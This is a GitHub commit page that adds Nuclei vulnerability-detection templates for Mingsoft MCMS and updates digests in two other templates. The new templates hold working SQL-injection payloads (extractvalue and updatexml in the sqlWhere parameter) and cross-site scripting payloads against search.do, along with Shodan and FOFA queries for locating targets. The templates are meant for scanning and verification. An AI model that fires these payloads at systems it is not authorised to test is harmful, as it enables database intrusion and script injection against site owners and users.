Skip to content

Commit

Permalink
Auto Update Nuclei [Fri Dec 6 12:41:01 UTC 2024] :robot:
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Dec 6, 2024
1 parent 141e9c5 commit e590ad5
Show file tree
Hide file tree
Showing 6 changed files with 260 additions and 2 deletions.
2 changes: 1 addition & 1 deletion plugins/adobe/experience_manager/CVE-2019-16469.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -57,4 +57,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100c5a1523ec8d463c59193c563f4f9e40f557165f905389ef8a85c5aadef149a46022070b9886d0c60a7320c08a35bfb19d93e85e8cd429dfe92724a6318bb3e61b5dc:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022018b3ecbaa1c877bb9be7d5ebea7e6d28ad44729da3b91ca8ab83af91dd5468d102200bb03eb0870607f23a5ff806b1bad6979063a28d7c720e36a8646aa968b2180e:922c64590222798bb761d5b6d8e72950
2 changes: 1 addition & 1 deletion plugins/apache/solr/CVE-2024-45216.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -51,4 +51,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100ac38a6fda2ec76b8c772cb2c8dbd260c74f313b39ed67db1edccd05e9603fa30022100cd2f812ebf038336b36ba49946e956b27236a32163237c2a3faac1610377c201:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202a5a82dbb90697b4a510b36378509842ca862a068b299e5a9e17bdb311ed8f4d022100a02a1de63770ec9ce0673caefc8a0ce7b0a3c4cd5f11dcf602fef4d9cea85dc1:922c64590222798bb761d5b6d8e72950
75 changes: 75 additions & 0 deletions plugins/mingsoft/mcms/CVE-2022-4375.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,75 @@
id: CVE-2022-4375

info:
name: Mingsoft MCMS - SQL Injection
author: ritikchaddha
severity: critical
description: |
SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data.
remediation: |
Apply the vendor-supplied patch or update to the latest version.
reference:
- https://gitee.com/mingSoft/MCMS/issues/I61TG5
- https://nvd.nist.gov/vuln/detail/CVE-2022-4375
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4375
cwe-id: CWE-89,CWE-707
epss-score: 0.00263
epss-percentile: 0.6564
cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: mingsoft
product: mcms
shodan-query: http.favicon.hash:1464851260
fofa-query: icon_hash="1464851260"
tags: cve,cve2022,mingsoft,mcms,sqli

flow: http(1) && http(2)

http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- "mingsoft.net"
internal: true

- raw:
- |
POST /cms/category/list? HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sqlWhere=%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d
matchers-condition: and
matchers:
- type: word
part: body
words:
- "java.sql.SQLSyntaxErrorException"
- "java.sql.SQLException"
condition: or

- type: word
part: body
words:
- "Icategorydao.xml"
- "cms_category"
condition: or

- type: status
status:
- 500
- 200
# digest: 4b0a00483046022100b52660dbfc278d0fb902f7b6ad6409c6f8d11eb36a8428bdcf548c90599288af022100f326ca6a4d977c1eb324020c939b918044cc75049970d0050a2db9a0e3adccf8:922c64590222798bb761d5b6d8e72950
69 changes: 69 additions & 0 deletions plugins/mingsoft/mcms/CVE-2023-3990.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,69 @@
id: CVE-2023-3990

info:
name: Mingsoft MCMS < 5.3.1 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data.
remediation: |
We recommend that you update to the latest version 5.4 or above.
reference:
- https://gitee.com/mingSoft/MCMS/issues/I7K4DQ
- https://nvd.nist.gov/vuln/detail/CVE-2023-3990
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3990
cwe-id: CWE-79
epss-score: 0.00345
epss-percentile: 0.6789
cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: mingsoft
product: mcms
shodan-query: http.favicon.hash:1464851260
fofa-query: icon_hash="1464851260"
tags: cve,cve2023,mingsoft,mcms,xss

flow: http(1) && http(2)

http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- "mingsoft.net"
internal: true

- raw:
- |
POST /mcms/search.do HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
content_title=1&style=%3CScRiPt%3Ealert(document.domain)%3C%2FScRiPt%3Ealert
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<ScRiPt>alert(document.domain)</ScRiPt>alert"

- type: word
part: content_type
words:
- text/html

- type: status
status:
- 200
# digest: 490a0046304402204016d0b0e3cdafff4062e2f017da299f0703443b6d3cba7be9c9a6fdbe2897190220507efd9ae864c249d3f413a436b6056b39775667353069de8ea189ecc894fa96:922c64590222798bb761d5b6d8e72950
47 changes: 47 additions & 0 deletions plugins/mingsoft/mcms/mcms-list-sqli.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,47 @@
id: mcms-list-sqli

info:
name: Mingsoft MCMS 5.2.1 - SQL Injection
author: ritikchaddha
severity: critical
description: |
SQL injection vulnerability in Mingsoft MCMS 5.2.1 via the dictType parameter in /mdiy/dict/listExcludeApp.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data.
remediation: |
We recommend that you update to the latest version 5.4 or above.
reference:
- https://gitee.com/mingSoft/MCMS/issues/I8MAJK
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89,CWE-707
epss-score: 0.00263
epss-percentile: 0.6564
cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: mingsoft
product: mcms
shodan-query: http.favicon.hash:1464851260
fofa-query: icon_hash="1464851260"
tags: mingsoft,mcms,sqli

variables:
num: "999999999"

http:
- raw:
- |
POST /cms/content/list.do HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
categoryType=1&sqlWhere=%5b%7b%22action%22%3a%22and%22%2c%22field%22%3a%22updatexml(1%2cconcat(0x7e%2cmd5({{num}})%2c0x7e)%2c1)%22%2c%22el%22%3a%22eq%22%2c%22model%22%3a%22contentTitle%22%2c%22name%22%3a%22%C3%A6%C2%96%C2%87%C3%A7%C2%AB%20%C3%A6%20%C2%87%C3%A9%C2%A2%C2%98%22%2c%22type%22%3a%22input%22%2c%22value%22%3a%22111%22%7d%5d&pageNo=1&pageSize=10
matchers:
- type: word
part: body
words:
- "c8c605999f3d8352d7bb792cf3fdb25"
67 changes: 67 additions & 0 deletions plugins/mingsoft/mcms/mcms-search-xss.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,67 @@
id: mcms-search-xss

info:
name: Mingsoft MCMS < 5.3.1 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data.
remediation: |
We recommend that you update to the latest version 5.4 or above.
reference:
- https://gitee.com/mingSoft/MCMS/issues/I5MT8Y
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
epss-score: 0.00345
epss-percentile: 0.6789
cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: mingsoft
product: mcms
shodan-query: http.favicon.hash:1464851260
fofa-query: icon_hash="1464851260"
tags: mingsoft,mcms,xss

flow: http(1) && http(2)

http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- "mingsoft.net"
internal: true

- raw:
- |
POST /mcms/search.do HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
content_title=1"><sVg/Onload=alert`document.domain`></p>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "><sVg/Onload=alert`document.domain`>"

- type: word
part: content_type
words:
- text/html

- type: status
status:
- 200
# digest: 490a004630440220243d7fee42311b9915a8bd3fba36c0e4b5d32b74f5c109dfb3a05a763638f64302205f42add18eb82ea7f1b7681b2b6144d55663838620f9313c3056f222dfd13077:922c64590222798bb761d5b6d8e72950

0 comments on commit e590ad5

Please sign in to comment.